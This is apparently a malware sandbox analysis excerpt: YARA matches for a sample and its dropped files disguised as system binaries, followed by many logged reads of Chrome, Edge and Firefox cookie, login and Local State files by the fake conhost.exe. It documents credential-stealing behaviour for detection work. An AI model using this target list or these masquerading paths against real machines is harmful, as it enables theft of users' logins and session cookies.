                                    Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 1924, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: hPeZTHbzcsUskSflSyozwAqUA.exe PID: 3352, type: MEMORYSTR
                                    Source: Yara matchFile source: Zn0uX5K1ez.exe, type: SAMPLE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 10.0.msinto.exe.a00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b124a5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4625570.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockhostnet\msinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\debug\explorer.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\lsass.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, type: DROPPED
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
